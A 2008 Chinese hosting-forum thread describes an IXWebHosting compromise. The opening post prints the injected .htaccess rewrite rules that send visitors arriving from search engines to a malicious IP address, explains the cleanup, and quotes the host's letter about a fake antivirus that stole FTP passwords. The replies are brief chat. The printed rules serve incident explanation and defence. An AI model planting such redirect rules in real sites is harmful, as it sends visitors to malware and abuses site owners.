IXWebHosting特别优惠

 

IXWebHosting为 本站用户提供特别优惠

最低只需3.95美元/月

美国主机侦探论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

Godaddy优惠码 美国主机优惠信息汇总出售cPanel CloudLinux R1SoftGodaddy美国空间代购
IX WebHosting专题站国外主机资料导航支持支付宝付款的美国主机HostEase速度快中文客服!
查看: 2664|回复: 7

[其他] 关于IXwebhosting上出现的安全问题 [复制链接]

超级版主

GOD is a girl

Rank: 8Rank: 8

金币
86
银币
102644
侦探币
6
威望
214
阅读权限
200
帖子
25773
精华
14
积分
25913
UID
2
发表于 2008-12-10 10:58:50 AM |显示全部楼层
WebHostingPad优惠码
症状:
直接进入网站没有问题,从google等国外著名搜索引擎进入网站就会转向到一个病毒网站。
具体例子请看: http://bbs.idcspy.com/thread-36706-1-1.html

原因: 网站的.htaccess文件被修改,会加入如下代码:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]

上面的代码就是判断访问者来源,如果是来自上面那些搜索引擎,就自动转向

解决方法:
修正.htaccess,并且去掉.htaccess的写入权限。同时修正根目录的权限,去掉写入权限。

来自IXwebhosting官方的信息,此安全隐患已经得到修正,他们也杀掉了服务器上大部分此类病毒,如果还有问题,请联系ixwebhosting检查。被感染的原因可能是由于你的ftp密码被盗,进而被修改网站文件。

下面是ixwebhosting关于此问题发给用户的信件:

In our ongoing commitment to the security of our customers, we have discovered a vulnerability located within many of our client's websites, including yours. This is a self replicating virus which is found by visiting well-known search engines. When you click on any link it may redirect you to a fake Anti-Virus 2009 website which appears to scan your system and then asks you to download the software. Once downloaded and installed it begins displaying pop ups on your desktop. At this time it collects your FTP user name and password from your own computer and uses that information to upload an exploited file named ".htaccess" to your website. Any visitors to your website will then be redirected to the fake anti-virus website.

We have dedicated our systems administration team to finding a solution to this and are happy to say that as one of the first hosting companies we have successfully cleaned all instances of this virus from our servers more than a week ago, and are continually scanning them to ensure your site does not become re-infected.

While your website is now secure, your computer may still be at risk. Here are two easy steps that will detect and remove this malicious software from your computer and make sure your website will not spread the virus again:

1. Uninstall the fake Anti-Virus software by following the instructions at this link:
http://www.bleepingcomputer.com/ ... tall-antivirus-2009

2. Once removed, change your FTP password from within your web hosting control panel. Once logged in, click on the FTP Manager icon and then on the icon next to the password to change it.

To illustrate the severity of the issue I would like to share some facts with you:

   * 26,991 of our customers have been infected with fake Anti-Virus 2009
   * 79,469 websites have been spreading the Anti-Virus 2009 infection
   * 120,923 malicious files have been removed from our system

We are constantly monitoring our servers for potential threats to your website, and are proud to say that we are among the first web hosts to identify this particular problem, and have been the first to offer a resolution. Your continued and safe presence on the internet is our top priority.

If you have questions regarding any of this information, please contact our support team anytime.

Kind Regards,

Fatima Said, CCO
IX Web Hosting

Rank: 8Rank: 8

金币
6459
银币
154259
侦探币
2845
威望
489
阅读权限
90
帖子
59154
精华
3
积分
59184
UID
21374
发表于 2008-12-11 01:36:52 PM |显示全部楼层
HostEase
规则收藏

使用道具 举报

版主

自定义头衔

Rank: 7Rank: 7Rank: 7

金币
806
银币
11758
侦探币
1384
威望
1409
阅读权限
100
帖子
29149
精华
18
积分
29329
UID
18239
发表于 2008-12-11 02:10:01 PM |显示全部楼层
原来是中毒了啊。
有问题请开贴,不要pm。
论坛10金币=1RMB,500金币可提现,支付宝或paypal。
我的博客http://www.btcoder.com/

使用道具 举报

版主

自定义头衔

Rank: 7Rank: 7Rank: 7

金币
806
银币
11758
侦探币
1384
威望
1409
阅读权限
100
帖子
29149
精华
18
积分
29329
UID
18239
发表于 2008-12-11 11:06:11 PM |显示全部楼层
大漠有ix的主机吗?
你说他们换了机房,现在他们的虚拟主机还稳定不?????????
有问题请开贴,不要pm。
论坛10金币=1RMB,500金币可提现,支付宝或paypal。
我的博客http://www.btcoder.com/

使用道具 举报

超级版主

GOD is a girl

Rank: 8Rank: 8

金币
86
银币
102644
侦探币
6
威望
214
阅读权限
200
帖子
25773
精华
14
积分
25913
UID
2
发表于 2008-12-12 09:01:10 AM |显示全部楼层
HostEase
原帖由 ffnn 于 2008-12-11 11:06 PM 发表 http://bbs.idcspy.com/images/common/back.gif
大漠有ix的主机吗?
你说他们换了机房,现在他们的虚拟主机还稳定不?????????

这几个月还不错,没出什么问题
换机房之后就好多了
我的是linux的,windows的情况不太清楚

使用道具 举报

超级版主

GOD is a girl

Rank: 8Rank: 8

金币
86
银币
102644
侦探币
6
威望
214
阅读权限
200
帖子
25773
精华
14
积分
25913
UID
2
发表于 2008-12-12 09:01:31 AM |显示全部楼层
原帖由 add.c 于 2008-12-11 01:36 PM 发表 http://bbs.idcspy.com/images/common/back.gif
规则收藏

你要做什么

使用道具 举报

版主

自定义头衔

Rank: 7Rank: 7Rank: 7

金币
806
银币
11758
侦探币
1384
威望
1409
阅读权限
100
帖子
29149
精华
18
积分
29329
UID
18239
发表于 2008-12-12 11:46:04 AM |显示全部楼层
WebHostingPad优惠码
意思是说收藏了,好东西他都要收藏
有问题请开贴,不要pm。
论坛10金币=1RMB,500金币可提现,支付宝或paypal。
我的博客http://www.btcoder.com/

使用道具 举报

Rank: 1

金币
0
银币
142
侦探币
0
威望
0
阅读权限
10
帖子
38
精华
0
积分
38
UID
37404
发表于 2010-1-7 03:22:52 PM |显示全部楼层
WebHostingPad优惠码
好帖子,学习了,谢谢

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

论坛言论由会员发布,不代表本论坛观点;非交易论坛,本站不对会员间交易承担任何责任。

代购请联系本站客服

美国主机侦探 回顶部